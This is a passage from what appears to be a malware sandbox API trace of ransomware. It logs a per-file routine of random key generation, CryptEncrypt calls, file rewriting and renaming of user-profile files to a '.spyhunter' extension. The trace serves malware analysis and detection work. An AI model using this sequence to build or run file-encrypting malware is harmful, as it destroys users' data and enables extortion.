"c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\windowsmail.pat.spyhunter")) returned 1 [0141.987] GetProcessHeap () returned 0x2c0000 [0141.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6eda0 | out: hHeap=0x2c0000) returned 1 [0141.988] GetProcessHeap () returned 0x2c0000 [0141.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0141.988] GetProcessHeap () returned 0x2c0000 [0141.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30008f0 | out: hHeap=0x2c0000) returned 1 [0141.988] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f398 | out: pbBuffer=0x248f398) returned 1 [0141.988] GetProcessHeap () returned 0x2c0000 [0141.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0141.988] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f390*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f390*=0x30) returned 1 [0141.988] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\94308059b57b3142e455b38a6eb92015"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0142.021] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015") returned 106 [0142.021] StrStrW (lpFirst="94308059B57B3142E455B38A6EB92015", lpSrch=".txt") returned 0x0 [0142.021] GetProcessHeap () returned 0x2c0000 [0142.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0142.021] ReadFile (in: hFile=0xf4, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f354, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f354*=0x130, lpOverlapped=0x0) returned 1 [0142.022] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xfffffed0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.022] WriteFile (in: hFile=0xf4, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x248f354, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f354*=0x130, lpOverlapped=0x0) returned 1 [0142.022] GetProcessHeap () returned 0x2c0000 [0142.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0142.022] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.022] WriteFile (in: hFile=0xf4, lpBuffer=0x248f394*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f354, lpOverlapped=0x0 | out: lpBuffer=0x248f394*, lpNumberOfBytesWritten=0x248f354*=0x4, lpOverlapped=0x0) returned 1 [0142.022] WriteFile (in: hFile=0xf4, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f354, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f354*=0x30, lpOverlapped=0x0) returned 1 [0142.022] CloseHandle (hObject=0xf4) returned 1 [0142.022] GetProcessHeap () returned 0x2c0000 [0142.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0142.023] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015.spyhunter") returned 116 [0142.023] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\94308059b57b3142e455b38a6eb92015"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015.spyhunter" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\94308059b57b3142e455b38a6eb92015.spyhunter")) returned 1 [0142.023] GetProcessHeap () returned 0x2c0000 [0142.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0142.023] GetProcessHeap () returned 0x2c0000 [0142.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0142.023] GetProcessHeap () returned 0x2c0000 [0142.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffaf38 | out: hHeap=0x2c0000) returned 1 [0142.023] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f390 | out: pbBuffer=0x248f390) returned 1 [0142.023] GetProcessHeap () returned 0x2c0000 [0142.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0142.023] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f388*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f388*=0x30) returned 1 [0142.024] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini" (normalized: "c:\\users\\default\\downloads\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0142.060] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini") returned 42 [0142.060] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0142.060] GetProcessHeap () returned 0x2c0000 [0142.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0142.060] ReadFile (in: hFile=0x184, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f34c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f34c*=0x11a, lpOverlapped=0x0) returned 1 [0142.061] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xfffffee6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.061] WriteFile (in: hFile=0x184, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x11a, lpNumberOfBytesWritten=0x248f34c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f34c*=0x11a, lpOverlapped=0x0) returned 1 [0142.061] GetProcessHeap () returned 0x2c0000 [0142.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0142.061] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.061] WriteFile (in: hFile=0x184, lpBuffer=0x248f38c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f34c, lpOverlapped=0x0 | out: lpBuffer=0x248f38c*, lpNumberOfBytesWritten=0x248f34c*=0x4, lpOverlapped=0x0) returned 1 [0142.061] WriteFile (in: hFile=0x184, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f34c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f34c*=0x30, lpOverlapped=0x0) returned 1 [0142.062] CloseHandle (hObject=0x184) returned 1 [0142.062] GetProcessHeap () returned 0x2c0000 [0142.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0142.062] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini.spyhunter") returned 52 [0142.062] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini" (normalized: "c:\\users\\default\\downloads\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini.spyhunter" (normalized: "c:\\users\\default\\downloads\\desktop.ini.spyhunter")) returned 1 [0142.062] GetProcessHeap () returned 0x2c0000 [0142.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0142.062] GetProcessHeap () returned 0x2c0000 [0142.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0142.062] GetProcessHeap () returned 0x2c0000 [0142.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0b128 | out: hHeap=0x2c0000) returned 1 [0142.062] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f390 | out: pbBuffer=0x248f390) returned 1 [0142.062] GetProcessHeap () returned 0x2c0000 [0142.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0142.063] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f388*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f388*=0x30) returned 1 [0142.063] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\." (normalized: "c:\\users\\default\\contacts\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0142.176] GetProcessHeap () returned 0x2c0000 [0142.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0142.176] GetProcessHeap () returned 0x2c0000 [0142.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f36738 | out: hHeap=0x2c0000) returned 1 [0142.176] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f388 | out: pbBuffer=0x248f388) returned 1 [0142.176] GetProcessHeap () returned 0x2c0000 [0142.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0142.176] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f380*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f380*=0x30) returned 1 [0142.176] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at home.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0142.194] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned 71 [0142.195] StrStrW (lpFirst="Microsoft At Home.url", lpSrch=".txt") returned 0x0 [0142.195] GetProcessHeap () returned 0x2c0000 [0142.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0142.195] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f344, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f344*=0x85, lpOverlapped=0x0) returned 1 [0142.196] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.196] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x248f344, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f344*=0x85, lpOverlapped=0x0) returned 1 [0142.196] GetProcessHeap () returned 0x2c0000 [0142.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0142.196] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.196] WriteFile (in: hFile=0x178, lpBuffer=0x248f384*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f344, lpOverlapped=0x0 | out: lpBuffer=0x248f384*, lpNumberOfBytesWritten=0x248f344*=0x4, lpOverlapped=0x0) returned 1 [0142.196] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f344, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f344*=0x30, lpOverlapped=0x0) returned 1 [0142.196] CloseHandle (hObject=0x178) returned 1 [0142.196] GetProcessHeap () returned 0x2c0000 [0142.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0142.197] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url.spyhunter") returned 81 [0142.197] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at home.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url.spyhunter" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at home.url.spyhunter")) returned 1 [0142.197] GetProcessHeap () returned 0x2c0000 [0142.197] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0142.197] GetProcessHeap () returned 0x2c0000 [0142.197] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0142.198] GetProcessHeap () returned 0x2c0000 [0142.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fefac0 | out: hHeap=0x2c0000) returned 1 [0142.201] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f380 | out: pbBuffer=0x248f380) returned 1 [0142.201] GetProcessHeap () returned 0x2c0000 [0142.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0142.201] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f378*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f378*=0x30) returned 1 [0142.201] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live spaces.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0142.201] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url") returned 67 [0142.201] StrStrW (lpFirst="Windows Live Spaces.url", lpSrch=".txt") returned 0x0 [0142.201] GetProcessHeap () returned 0x2c0000 [0142.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0142.201] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f33c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f33c*=0x85, lpOverlapped=0x0) returned 1 [0142.202] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.202] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x248f33c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f33c*=0x85, lpOverlapped=0x0) returned 1 [0142.203] GetProcessHeap () returned 0x2c0000 [0142.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0142.203] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.203] WriteFile (in: hFile=0x178, lpBuffer=0x248f37c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f33c, lpOverlapped=0x0 | out: lpBuffer=0x248f37c*, lpNumberOfBytesWritten=0x248f33c*=0x4, lpOverlapped=0x0) returned 1 [0142.203] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f33c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f33c*=0x30, lpOverlapped=0x0) returned 1 [0142.203] CloseHandle (hObject=0x178) returned 1 [0142.203] GetProcessHeap () returned 0x2c0000 [0142.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0142.203] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url.spyhunter") returned 77 [0142.203] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live spaces.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url.spyhunter" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live spaces.url.spyhunter")) returned 1 [0142.204] GetProcessHeap () returned 0x2c0000 [0142.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0142.204] GetProcessHeap () returned 0x2c0000 [0142.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0142.204] GetProcessHeap () returned 0x2c0000 [0142.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef7a48 | out: hHeap=0x2c0000) returned 1 [0142.204] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f378 | out: pbBuffer=0x248f378) returned 1 [0142.204] GetProcessHeap () returned 0x2c0000 [0142.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0142.204] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f370*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f370*=0x30) returned 1 [0142.204] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live mail.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0142.205] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url") returned 65 [0142.205] StrStrW (lpFirst="Windows Live Mail.url", lpSrch=".txt") returned 0x0 [0142.205] GetProcessHeap () returned 0x2c0000 [0142.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0142.205] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f334, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f334*=0x85, lpOverlapped=0x0) returned 1 [0142.206] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.206] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x248f334, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f334*=0x85, lpOverlapped=0x0) returned 1 [0142.206] GetProcessHeap () returned 0x2c0000 [0142.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0142.206] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.206] WriteFile (in: hFile=0x178, lpBuffer=0x248f374*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f334, lpOverlapped=0x0 | out: lpBuffer=0x248f374*, lpNumberOfBytesWritten=0x248f334*=0x4, lpOverlapped=0x0) returned 1 [0142.206] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f334, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f334*=0x30, lpOverlapped=0x0) returned 1 [0142.206] CloseHandle (hObject=0x178) returned 1 [0142.206] GetProcessHeap () returned 0x2c0000 [0142.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0142.206] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url.spyhunter") returned 75 [0142.206] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live mail.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url.spyhunter" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live mail.url.spyhunter")) returned 1 [0142.207] GetProcessHeap () returned 0x2c0000 [0142.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0142.207] GetProcessHeap () returned 0x2c0000 [0142.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0142.207] GetProcessHeap () returned 0x2c0000 [0142.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef7978 | out: hHeap=0x2c0000) returned 1 [0142.207] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f378 | out: pbBuffer=0x248f378) returned 1 [0142.207] GetProcessHeap () returned 0x2c0000 [0142.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0142.207] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f370*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f370*=0x30) returned 1 [0142.207] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0142.208] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url") returned 68 [0142.208] StrStrW (lpFirst="Windows Live Gallery.url", lpSrch=".txt") returned 0x0 [0142.208] GetProcessHeap () returned 0x2c0000 [0142.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0142.208] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f334, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f334*=0x85, lpOverlapped=0x0) returned 1 [0142.208] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.209] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x248f334, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f334*=0x85, lpOverlapped=0x0) returned 1 [0142.209] GetProcessHeap () returned 0x2c0000 [0142.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0142.209] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.209] WriteFile (in: hFile=0x178, lpBuffer=0x248f374*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f334, lpOverlapped=0x0 | out: lpBuffer=0x248f374*, lpNumberOfBytesWritten=0x248f334*=0x4, lpOverlapped=0x0) returned 1 [0142.209] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f334, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f334*=0x30, lpOverlapped=0x0) returned 1 [0142.209] CloseHandle (hObject=0x178) returned 1 [0142.209] GetProcessHeap () returned 0x2c0000 [0142.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0142.209] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url.spyhunter") returned 78 [0142.209] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live gallery.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url.spyhunter" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live gallery.url.spyhunter")) returned 1 [0142.210] GetProcessHeap () returned 0x2c0000 [0142.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0142.210] GetProcessHeap () returned 0x2c0000 [0142.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0142.210] GetProcessHeap () returned 0x2c0000 [0142.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fefc70 | out: hHeap=0x2c0000) returned 1 [0142.210] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f370 | out: pbBuffer=0x248f370) returned 1 [0142.210] GetProcessHeap () returned 0x2c0000 [0142.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0142.210] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f368*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f368*=0x30) returned 1 [0142.210] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows 